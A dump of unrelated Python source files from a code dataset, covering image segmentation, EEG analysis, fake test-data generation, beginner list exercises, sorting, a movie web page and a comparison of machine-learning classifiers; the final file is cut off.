cv2.pyrMeanShiftFiltering(\n src=img_contrast, # Original image\n sp=self.mean_filtering_sp, # Size of spatial window\n sr=self.mean_filtering_sr, # Size of color window\n maxLevel=self.mean_filtering_level # Pyramid level\n )\n\n # Do graph segmentation at image\n ss = cv2.ximgproc.segmentation.createGraphSegmentation(\n sigma=self.segmentation_sigma, # Smoothness\n k=self.segmentation_k, # Neighbor regions\n min_size=self.segmentation_min # Minimum segment size\n )\n segmented = ss.processImage(mean_filtering)\n segmented = np.repeat(\n np.reshape(segmented, [img_h, img_w, 1]),\n repeats=3,\n axis=2\n ).astype(dtype=np.float32)\n segmented = np.multiply(segmented, img_mask)\n\n # Select interest region\n interest_point = (int(img_w / 2), img_h - 4)\n selected_region = np.array(\n segmented == segmented[interest_point[1]][interest_point[0]]\n ).astype(dtype=np.float32)\n\n # Fill holes\n fill = np.zeros((img_h + 2, img_w + 2), dtype=np.uint8)\n cv2.floodFill(\n image=selected_region,\n mask=fill,\n seedPoint=(0, 0),\n newVal=0\n )\n fill = (fill == 0).astype(dtype=np.uint8)[1:-1, 1:-1]\n\n if show_result:\n # Show results =============================================\n # Merge original image and interest region for compare\n merge = (img_contrast * 0.5 + np.repeat(\n np.reshape(\n fill * 125,\n (img_h, img_w, 1)\n ),\n repeats=3,\n axis=2\n )).astype(dtype=np.uint8)\n\n images = [\n img,\n img_contrast,\n mean_filtering,\n segmented,\n selected_region,\n fill,\n merge\n ]\n titles = [\n img_name,\n 'Contrast',\n 'Mean filtering',\n 'Segmented',\n 'Extracted',\n 'Fill',\n 'Merge'\n ]\n\n for idx, (img, title) in enumerate(zip(images, titles)):\n plt.subplot(len(images), 1, idx + 1)\n plt.imshow(img)\n plt.title(title)\n plt.xticks([])\n plt.yticks([])\n\n mng = plt.get_current_fig_manager()\n mng.window.state('zoomed')\n plt.show()\n # ===========================================================\n\n return fill\n","repo_name":"Tamuel/FisheyeDewarping","sub_path":"FisheyeDewarping/cv_segmentation.py","file_name":"cv_segmentation.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"15927975588","text":"import os\nimport mne\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\n# load a sample epoch file\nepo = mne.read_epochs('./EPO/1001_PV0-epo.fif', proj=False, add_eeg_ref=False)\nepo.info['picks'] = None\nepo.pick_channels(epo.ch_names[:64])\n\n# convert time to milliseconds\nt = epo.times*1e3\n\n# load the layout file\nlout = mne.channels.read_layout('biosemi.lay')\n\n# load the erp data\nerp = np.load('evo-all.npy')\nerp *= 1e6 # convert to microvolts\n'''\n# remove some time indices\ntix = np.logical_and(t > 0, t < 500)\nt = t[tix]\nerp = erp[:, :, :, tix]\n'''\n# run the two way anova\nf, p = mne.stats.f_mway_rm(erp, [2, 2])\nf, p = f.reshape(3, 64, -1), p.reshape(3, 64, -1)\n\n# plot the fmap\nfig = plt.figure()\nfor n in range(64):\n ax = fig.add_axes(lout.pos[n])\n ax.plot(t, f[:, n].T)\n ax.set_ylim((0, f.max()))\n\n# plot the erps\nfig = plt.figure()\nfor n in range(64):\n ax = fig.add_axes(lout.pos[n])\n for m, c in enumerate(['c', 'm', 'b', 'r']):\n ax.plot(t, erp[:, m, n].mean(0), c)\n ax.set_ylim((erp.mean(0).min(), erp.mean(0).max()))\n\nplt.show() \n","repo_name":"snn88/EmoWorM_Analysis","sub_path":"p300.py","file_name":"p300.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33219190612","text":"import pandas as pd\nimport csv\nimport json\nfrom faker import Faker\nfake = Faker()\n\n\ndef make_fake_custom_fields():\n df1 = pd.read_csv('../fake_data_for_testing.csv')\n i = 0\n custom_fields = list()\n while i < 500:\n field = list()\n account_manager = dict()\n account_manager[\"id\"] = 12345\n account_manager[\"value\"] = fake.name()\n field.append(account_manager)\n \n cc = dict()\n cc[\"id\"] = 6789\n cc[\"value\"] = fake.credit_card_full()\n field.append(cc)\n\n custom_fields.append(\n json.dumps(field)\n )\n i += 1\n df2 = pd.DataFrame({\"custom_fields\":custom_fields})\n df3 = pd.concat([df1,df2],axis=1)\n df3.to_csv(\"../copy.csv\",index=False)\n\n\nif __name__ == \"__main__\":\n make_fake_custom_fields()","repo_name":"aa-ag/sqlexperiments","sub_path":"scripts/generate_fake_data.py","file_name":"generate_fake_data.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18324203313","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : sort.py\n# @Author: Lizi\n# @Date : 2020/9/7\n'''输入三个整数x,y,z,请把这三个数由小到大输出。'''\nlist1 = []\nfor i in range(3):\n x = int(input(\"请输入3个数:\"))\n list1.append(x)\nlist1.sort()\nprint(list1)","repo_name":"rage-vampire/Python","sub_path":"lizi_project/lizi_practise/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15827590058","text":"#!/usr/bin/env python3\n\n# Author: Suthakar Shiny Gladdys\n# Date Last Modified: 11/3/2022\n\nimport sys, os\nimport pandas as pd\nimport datetime\n\n\ndef time_process(df):\n df[['start_time', 'end_time']] = df['times'].str.split(' ', n=1, expand=True)\n df.drop(['times'], axis=1, inplace=True)\n df = df[['start_time', 'end_time', 'sentence']]\n df.index += 1\n\n # millisecond format standardizing\n df['start_time'] = df['start_time'] + '0'\n df['end_time'] = df['end_time'] + '0'\n\n # splitting start & end times into seconds and milliseconds\n df[['st_1', 'st_2']] = df['start_time'].str.split('.', n=1, expand=True)\n df[['et_1', 'et_2']] = df['end_time'].str.split('.', n=1, expand=True)\n\n # standardizing seconds to HH:MM:SS\n df.st_1 = df.st_1.astype(int)\n df.et_1 = df.et_1.astype(int)\n df = df.reindex(columns = df.columns.tolist() + ['st_1_converted','et_1_converted'])\n\n for row in df.itertuples():\n df.at[row.Index, 'st_1_converted'] = datetime.timedelta(seconds = row.st_1)\n df.at[row.Index, 'et_1_converted'] = datetime.timedelta(seconds = row.et_1) \n\n df.st_1_converted = df.st_1_converted.astype(str)\n df.et_1_converted = df.et_1_converted.astype(str)\n df['st_1_converted'] = '0' + df['st_1_converted']\n df['et_1_converted'] = '0' + df['et_1_converted']\n\n # getting start & end times in SRT time format\n df['st_final'] = df['st_1_converted'] + ',' + df['st_2']\n df['et_final'] = df['et_1_converted'] + ',' + df['et_2']\n\n return df\n\n\ndef write_to_srt(folder, name, df):\n srt_file_path = os.path.join(folder, name + '.srt')\n srt_file = open(srt_file_path, 'a')\n df.index = df.index.astype(str)\n \n for index, row in df.iterrows():\n srt_file.write(index)\n srt_file.write('\\n')\n srt_file.write(row['st_final'] + ' --> ' + row['et_final'] + '\\n')\n srt_file.write(row['sentence'] + '\\n\\n')\n \n srt_file.close()\n\n\nfolder_path = sys.argv[1]\nos.chdir(folder_path)\nsrt_folder_path = os.path.join(os.path.dirname(os.getcwd()), 'srt')\nos.makedirs(srt_folder_path)\n\nfor file in os.listdir():\n if file.endswith(\".txt\"):\n file_path = f\"{folder_path}\\{file}\"\n file_name = file[:-4]\n file_df = pd.read_csv(file_path, names=['times', 'sentence'], delimiter='\\t')\n process_df = time_process(file_df)\n write_to_srt(srt_folder_path, file_name, process_df)\n\n\n","repo_name":"shinygs/FYP-Conversational-Speech","sub_path":"file_processing/YT_transcript_to_srt/YT_transcript_to_srt.py","file_name":"YT_transcript_to_srt.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4485054526","text":"## 1. Lists ##\n\nrow_2=['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3=['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\n\n## 2. Indexing ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nratings_1=row_1[3]\nratings_2=row_2[3]\nratings_3=row_3[3]\ntotal=ratings_1+ratings_2+ratings_3\naverage=total/3\n\n## 3. Negative Indexing ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrating_1=row_1[-1]\nrating_2=row_2[-1]\nrating_3=row_3[-1]\ntotal_rating=rating_1+rating_2+rating_3\naverage_rating=total_rating/3\n\n## 4. Retrieving Multiple List Elements ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\nfb_rating_data=[row_1[0],row_1[3],row_1[4]]\ninsta_rating_data=[row_2[0],row_2[3],row_2[4]]\npandora_rating_data=[row_5[0],row_5[3],row_5[4]]\ntotal=(fb_rating_data[2]+insta_rating_data[2]+pandora_rating_data[2])\navg_rating=total//3\n\n## 5. List Slicing ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\nfirst_4_fb=row_1[0:4]\nlast_3_fb=row_1[-3:]\npandora_3_4=[row_5[-3],row_5[-2]]\n\n\n\n## 6. List of Lists ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\napp_data_set=[row_1,row_2,row_3,row_4,row_5]\nsum=0.0\nfor i in app_data_set:\n sum=sum+i[4]\navg_rating=sum/5\n \n\n## 7. Opening a File ##\n\nfrom csv import reader\nopened_file=open(\"AppleStore.csv\")\nread_file=reader(opened_file)\napps_data=list(read_file)\nprint(len(apps_data))\nprint(apps_data[0])\nprint(apps_data[2:4])\n\n\n## 8. Repetitive Processes ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\n\napp_data_set = [row_1, row_2, row_3, row_4, row_5]\nfor i in app_data_set:\n print(i)\n\n## 9. For Loops ##\n\nrow_1 = ['Facebook', 0.0, 'USD', 2974676, 3.5]\nrow_2 = ['Instagram', 0.0, 'USD', 2161558, 4.5]\nrow_3 = ['Clash of Clans', 0.0, 'USD', 2130805, 4.5]\nrow_4 = ['Temple Run', 0.0, 'USD', 1724546, 4.5]\nrow_5 = ['Pandora - Music & Radio', 0.0, 'USD', 1126879, 4.0]\n\napp_data_set = [row_1, row_2, row_3, row_4, row_5]\nrating_sum=0\nrating=0\nfor i in app_data_set:\n rating=rating+1\n rating_sum=rating_sum+i[4]\navg_rating=rating_sum/rating\n\n \n\n## 10. The Average App Rating ##\n\nfrom csv import reader\nopened_file=open(\"AppleStore.csv\")\nread_file=reader(opened_file)\napps_data=list(read_file)\nrating_sum=0\nrating=0\nfor i in apps_data[1:]:\n rating=rating+1\n rating_sum=rating_sum+float(i[7])\navg_rating=rating_sum/rating \n\n## 11. Alternative Way to Compute an Average ##\n\nfrom csv import reader\nopened_file=open(\"AppleStore.csv\")\nread_file=reader(opened_file)\napps_data=list(read_file)\nall_ratings = []\nfor i in apps_data[1:]:\n all_ratings.append(float(i[7]))\navg_rating=sum(all_ratings)/len(all_ratings) ","repo_name":"J-Kiruthika/Data-Analysis-python","sub_path":"Lists and Indexing .py","file_name":"Lists and Indexing .py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9206808726","text":"# creating python classes(properties x behavior)\n# creating objects from our classes\n#self is used to bind the attributes to the arguments received\n#class Subjects:\n #def __init__(self,name, like, dislike):\n # self.name =name\n # self.like=like\n # self.dislike=dislike\n\n#sub1 = Subjects(\"Physics\",\"Yes\",\"No\")\n#print(\"I like\"+\"\" + sub1.name + \"\" + \"it gets me excited so I say\" + sub1.like + \"to it\")\n\nclass Student:\n def __init__(self,name, age, grade):\n self.name =name\n self.age=age\n self.grade=grade\n\n def get_grade(self):\n return self.grade\nclass Course:\n def __init__(self,name, max_students):\n self.name= name\n self.max_students=max_students\n self.students =[]\n def add_students(self,student):\n if len(self.students) < self.max_students:\n self.students.append(student)\n return True\n return False\n def get_average_grade(self):\n value = 0\n for student in self.students:\n value += student.get_grade()\n return value / len(self.students)\n\n\ns1=Student(\"Cheryl\",21,95)\ns2=Student(\"Jilian\",23,70)\ns3 =Student(\"Travis\",19,68)\n\ncourse= Course(\"Statistics\",3)\ncourse.add_students(s1)\ncourse.add_students(s2)\nprint(course.students[0].name)\nprint(course.get_average_grade())","repo_name":"Cherrypick14/pyclasses_objects_inheritance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2870858088","text":"# K % 2 == 0이면 오른쪽 노드, K % 2 == 1이면 왼쪽 노드로 감.\n# depth가 늘어날수록 K := (K//2) + (K % 2)로 업데이트한다.\n# 업데이트하면서 leaf node에 도달하게 되면, 그 leaf node가 바로 K번째 구슬이 떨어지는 노드이다.\n\nimport sys\nsys.setrecursionlimit(10**7)\ninput = sys.stdin.readline\n\nN = int(input())\ngraph = [0 for _ in range(N+1)] # graph[CURRENT] = CURRENT 노드의 직속자식 노드.\n\nfor CURRENT in range(1, N+1):\n LEFT, RIGHT = map(int, input().split())\n\n graph[CURRENT] = (LEFT, RIGHT)\n\nK = int(input())\n\ndef dfs(current):\n global K\n\n if graph[current] == (-1, -1):\n print(current)\n sys.exit()\n \n if graph[current][0] == -1: # 왼쪽 노드가 없으면\n dfs(graph[current][1]) # 오른쪽 노드로 그대로 감\n\n elif graph[current][1] == -1: # 오른쪽 노드가 없으면\n dfs(graph[current][0]) # 왼쪽 노드로 그대로 감\n\n else:\n is_left = K % 2 == 1 # K % 2 == 1이면 왼쪽 노드로 감. 아니면 오른쪽 노드.\n K = (K // 2) + (K % 2) # K update.\n\n if is_left: # 왼쪽 노드로 가야되면\n dfs(graph[current][0]) # 왼쪽 노드로 감.\n \n else: # 아니면\n dfs(graph[current][1]) # 오른쪽 노드\n\ndfs(1)","repo_name":"SimplePro/Algorithm","sub_path":"나무 위의 구슬.py","file_name":"나무 위의 구슬.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11440891388","text":"# used Merge Sort code from lecture 6 (Sorting) slides 89 - 90\ndef mergeSort(array, left, right, sortBy):\n if left < right:\n # m is the point where the array is divided into two subarrays\n mid = left + (right - left) // 2\n mergeSort(array, left, mid, sortBy)\n mergeSort(array, mid + 1, right, sortBy)\n # Merge the sorted subarrays\n merge(array, left, mid, right, sortBy)\n\n\ndef merge(array, left, mid, right, sortBy):\n # Create X ← arr[left..mid] & Y ← arr[mid+1..right]\n n1 = mid - left + 1\n n2 = right - mid\n X = [0] * n1\n Y = [0] * n2\n for i in range(0, n1):\n X[i] = array[left + i]\n for i in range(0, n2):\n Y[i] = array[mid + 1 + i]\n # Merge the arrays X and Y into arr\n i = 0\n j = 0\n k = left\n # If sorting by album name\n if sortBy == \"Album Name\":\n while i < n1 and j < n2:\n if X[i].albumName <= Y[j].albumName:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # If sorting by artist name\n if sortBy == \"Artist Name\":\n while i < n1 and j < n2:\n if X[i].artistName <= Y[j].artistName:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # If sorting by release date\n if sortBy == \"Release Date\":\n while i < n1 and j < n2:\n if X[i].albumReleaseDate <= Y[j].albumReleaseDate:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # If sorting by album number of tracks\n if sortBy == \"Album Number of Tracks\":\n while i < n1 and j < n2:\n if X[i].albumNumTracks <= Y[j].albumNumTracks:\n array[k] = X[i]\n i += 1\n else:\n array[k] = Y[j]\n j += 1\n k += 1\n # When we run out of elements in either X or Y append the remaining elements\n while i < n1:\n array[k] = X[i]\n i += 1\n k += 1\n while j < n2:\n array[k] = Y[j]\n j += 1\n k += 1","repo_name":"Anthony42540/RecordRackDSA","sub_path":"MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28677991792","text":"import webbrowser\nimport fresh_tomatoes\nimport media\n\ntoystory = media.Movie(\"Toy Story\",\n \"A story of a boy whose toys came back to life\",\n \"http://www.gstatic.com/tv/thumb/movieposters/17420/p17420_p_v8_ab.jpg\",\n \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\nskyfall = media.Movie(\"Skyfall\",\n \"Skyfall is the 23rd James Bond film produced by Eon Productions and released in 2012. \"\n \"It features Daniel Craig in his third performance as James Bond\",\n \"http://t2.gstatic.com/images?q=tbn:ANd9GcTSNSk0M1z_CZ1UKTnfE2nHmk4Oxqh_gKO0dAHZHwrfLX6D9Y4s\",\n \"https://www.youtube.com/watch?v=6kw1UVovByw\")\n\nsecretlifeofpets = media.Movie(\"The Secret Life of Pets\",\n \"The quiet life of a terrier named Max is upended when his owner takes in Duke, \"\n \"a stray whom Max instantly dislikes.\",\n \"https://upload.wikimedia.org/wikipedia/en/6/64/The_Secret_Life_of_Pets_poster.jpg\",\n \"https://www.youtube.com/watch?v=eWI_Jsw9qUs\")\n\ninception = media.Movie(\"Inception\",\n \"Inception is a 2010 science fiction heist thriller film written, co-produced, \"\n \"and directed by Christopher Nolan, and co-produced by Emma Thomas.\",\n \"http://t2.gstatic.com/images?q=tbn:ANd9GcRo9vfJCM6dzPkZHIHBVCtlJnAnew9Ai26kEdrli0-tfmatmciD\",\n \"https://www.youtube.com/watch?v=66TuSJo4dZM\")\n\nmovies = [toystory,skyfall,secretlifeofpets,inception]\nfresh_tomatoes.open_movies_page(movies)","repo_name":"lowhng/movie_web","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1678862558","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier, plot_tree\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom xgboost import XGBClassifier\nfrom xgboost import XGBRFClassifier\nfrom lightgbm import LGBMClassifier\nfrom catboost import CatBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.naive_bayes import MultinomialNB, BernoulliNB\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import BaggingClassifier\nfrom sklearn.neural_network import MLPClassifier\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import roc_auc_score\n\n\nclass Classification:\n\n def __init__(self, model, train_data, test_data, train_target, test_target):\n self.model = model\n self.train_data = train_data\n self.test_data = test_data\n self.train_target = train_target\n self.test_target = test_target\n\n def fit_predict(self):\n self.model.fit(self.train_data, self.train_target)\n self.y_pred = self.model.predict(self.test_data)\n\n return accuracy_score(self.test_target, self.y_pred)\n\n def classification_models(x_train, x_test, y_train, y_test):\n models_output_list = []\n\n #! logistic\n model_lr = LogisticRegression(max_iter=990)\n\n model_lr.fit(x_train, y_train)\n y_pred_lr = model_lr.predict(x_test)\n models_output_list.append(\n [\n \"LogisticRegression\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_lr),\n \"precision_score\",\n precision_score(y_test, y_pred_lr),\n \"f1_score\",\n f1_score(y_test, y_pred_lr),\n \"recall_score\",\n recall_score(y_test, y_pred_lr),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_lr),\n ],\n ]\n )\n\n #! KNeighborsClassifier\n model_knnc = KNeighborsClassifier()\n\n model_knnc.fit(x_train, y_train)\n y_pred_knnc = model_knnc.predict(x_test)\n models_output_list.append(\n [\n \"KNeighborsClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_knnc),\n \"precision_score\",\n precision_score(y_test, y_pred_knnc),\n \"f1_score\",\n f1_score(y_test, y_pred_knnc),\n \"recall_score\",\n recall_score(y_test, y_pred_knnc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_knnc),\n ],\n ]\n )\n #! DecisionTreeClassifier\n model_dtc = DecisionTreeClassifier()\n\n model_dtc.fit(x_train, y_train)\n y_pred_dtc = model_dtc.predict(x_test)\n models_output_list.append(\n [\n \"DecisionTreeClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_dtc),\n \"precision_score\",\n precision_score(y_test, y_pred_dtc),\n \"f1_score\",\n f1_score(y_test, y_pred_dtc),\n \"recall_score\",\n recall_score(y_test, y_pred_dtc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_dtc),\n ],\n ]\n )\n #! SVC\n model_svc = SVC()\n\n model_svc.fit(x_train, y_train)\n y_pred_svc = model_svc.predict(x_test)\n models_output_list.append(\n [\n \"SVC\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_svc),\n \"precision_score\",\n precision_score(y_test, y_pred_svc),\n \"f1_score\",\n f1_score(y_test, y_pred_svc),\n \"recall_score\",\n recall_score(y_test, y_pred_svc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_svc),\n ],\n ]\n )\n #! RandomForestClassifier\n model_rfc = RandomForestClassifier(random_state=42)\n\n model_rfc.fit(x_train, y_train)\n y_pred_rfc = model_rfc.predict(x_test)\n models_output_list.append(\n [\n \"RandomForestClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_rfc),\n \"precision_score\",\n precision_score(y_test, y_pred_rfc),\n \"f1_score\",\n f1_score(y_test, y_pred_rfc),\n \"recall_score\",\n recall_score(y_test, y_pred_rfc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_rfc),\n ],\n ]\n )\n #! GradientBoostingClassifier\n model_gbc = GradientBoostingClassifier()\n\n model_gbc.fit(x_train, y_train)\n y_pred_gbc = model_gbc.predict(x_test)\n models_output_list.append(\n [\n \"GradientBoostingClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_gbc),\n \"precision_score\",\n precision_score(y_test, y_pred_gbc),\n \"f1_score\",\n f1_score(y_test, y_pred_gbc),\n \"recall_score\",\n recall_score(y_test, y_pred_gbc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_gbc),\n ],\n ]\n )\n #! XGBClassifier\n model_xgbc = XGBClassifier()\n\n model_xgbc.fit(x_train, y_train)\n y_pred_xgbc = model_xgbc.predict(x_test)\n models_output_list.append(\n [\n \"XGBClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_xgbc),\n \"precision_score\",\n precision_score(y_test, y_pred_xgbc),\n \"f1_score\",\n f1_score(y_test, y_pred_xgbc),\n \"recall_score\",\n recall_score(y_test, y_pred_xgbc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_xgbc),\n ],\n ]\n )\n #! XGBRFClassifier\n model_xgbrfc = XGBRFClassifier()\n\n model_xgbrfc.fit(x_train, y_train)\n y_pred_xgbrfc = model_xgbrfc.predict(x_test)\n models_output_list.append(\n [\n \"XGBRFClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_xgbrfc),\n \"precision_score\",\n precision_score(y_test, y_pred_xgbrfc),\n \"f1_score\",\n f1_score(y_test, y_pred_xgbrfc),\n \"recall_score\",\n recall_score(y_test, y_pred_xgbrfc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_xgbrfc),\n ],\n ]\n )\n #! LGBMClassifier\n model_lgbmc = LGBMClassifier()\n\n model_lgbmc.fit(x_train, y_train)\n y_pred_lgbmc = model_lgbmc.predict(x_test)\n models_output_list.append(\n [\n \"LGBMClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_lgbmc),\n \"precision_score\",\n precision_score(y_test, y_pred_lgbmc),\n \"f1_score\",\n f1_score(y_test, y_pred_lgbmc),\n \"recall_score\",\n recall_score(y_test, y_pred_lgbmc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_lgbmc),\n ],\n ]\n )\n #! CatBoostClassifier\n model_cbc = CatBoostClassifier(verbose=False)\n\n model_cbc.fit(x_train, y_train)\n y_pred_cbc = model_cbc.predict(x_test)\n models_output_list.append(\n [\n \"CatBoostClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_cbc),\n \"precision_score\",\n precision_score(y_test, y_pred_cbc),\n \"f1_score\",\n f1_score(y_test, y_pred_cbc),\n \"recall_score\",\n recall_score(y_test, y_pred_cbc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_cbc),\n ],\n ]\n )\n\n #! GaussianNB\n model_gnb = GaussianNB()\n\n model_gnb.fit(x_train, y_train)\n y_pred_gnb = model_gnb.predict(x_test)\n models_output_list.append(\n [\n \"GaussianNB\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_gnb),\n \"precision_score\",\n precision_score(y_test, y_pred_gnb),\n \"f1_score\",\n f1_score(y_test, y_pred_gnb),\n \"recall_score\",\n recall_score(y_test, y_pred_gnb),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_gnb),\n ],\n ]\n )\n\n #! MLPClassifier\n model_mlpc = MLPClassifier()\n\n model_mlpc.fit(x_train, y_train)\n y_pred_mlpc = model_mlpc.predict(x_test)\n models_output_list.append(\n [\n \"MLPClassifier\",\n [\n \"accuracy_score\",\n accuracy_score(y_test, y_pred_mlpc),\n \"precision_score\",\n precision_score(y_test, y_pred_mlpc),\n \"f1_score\",\n f1_score(y_test, y_pred_mlpc),\n \"recall_score\",\n recall_score(y_test, y_pred_mlpc),\n \"roc_auc_score\",\n roc_auc_score(y_test, y_pred_mlpc),\n ],\n ]\n )\n\n highest_acs_output = [None, 0]\n highest_prs_output = [None, 0]\n highest_f1s_output = [None, 0]\n highest_rcs_output = [None, 0]\n highest_rocs_output = [None, 0]\n for a in range(10):\n for b in range(10):\n if b == 1:\n output_acs_value = models_output_list[a][1][1]\n if output_acs_value > highest_acs_output[1]:\n highest_acs_output[0] = models_output_list[a][0]\n highest_acs_output[1] = output_acs_value\n\n if b == 3:\n output_prs_value = models_output_list[a][1][3]\n if output_prs_value > highest_prs_output[1]:\n highest_prs_output[0] = models_output_list[a][0]\n highest_prs_output[1] = output_prs_value\n if b == 5:\n output_f1s_value = models_output_list[a][1][5]\n if output_f1s_value > highest_f1s_output[1]:\n highest_f1s_output[0] = models_output_list[a][0]\n highest_f1s_output[1] = output_f1s_value\n if b == 7:\n output_rcs_value = models_output_list[a][1][7]\n if output_rcs_value > highest_rcs_output[1]:\n highest_rcs_output[0] = models_output_list[a][0]\n highest_rcs_output[1] = output_rcs_value\n if b == 9:\n output_rocs_value = models_output_list[a][1][9]\n if output_rocs_value > highest_rocs_output[1]:\n highest_rocs_output[0] = models_output_list[a][0]\n highest_rocs_output[1] = output_rocs_value\n return (\n models_output_list,\n highest_acs_output,\n highest_f1s_output,\n highest_prs_output,\n highest_rcs_output,\n highest_rocs_output,\n )\n","repo_name":"fawern/machine_learning_libraries","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":12659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11160897400","text":"import argparse\nimport logging\nimport mldb\nimport os\nimport subprocess\nimport sys\nfrom sys import stdout\nimport zipfile\nimport xml.etree.ElementTree as ET\nimport re\nimport json\nimport time\nimport shutil\nimport tempfile\n\n\ndef log(msg):\n logger = logging.getLogger(__name__)\n logger.info(msg)\n\n\ndef error(msg):\n sys.exit(\"ERROR: {}\".format(msg))\n\n\ndef _extract_package_name_manifest(manifest_content):\n \"\"\" Parse a manifest xml file and return the package name. \"\"\"\n manifest = ET.fromstring(manifest_content)\n return manifest.get(\"{magicleap}package\")\n\n\ndef _extract_package_name(package):\n \"\"\" Extract (in memory) the manifest.xml from a package and return the package name. \"\"\"\n try:\n with 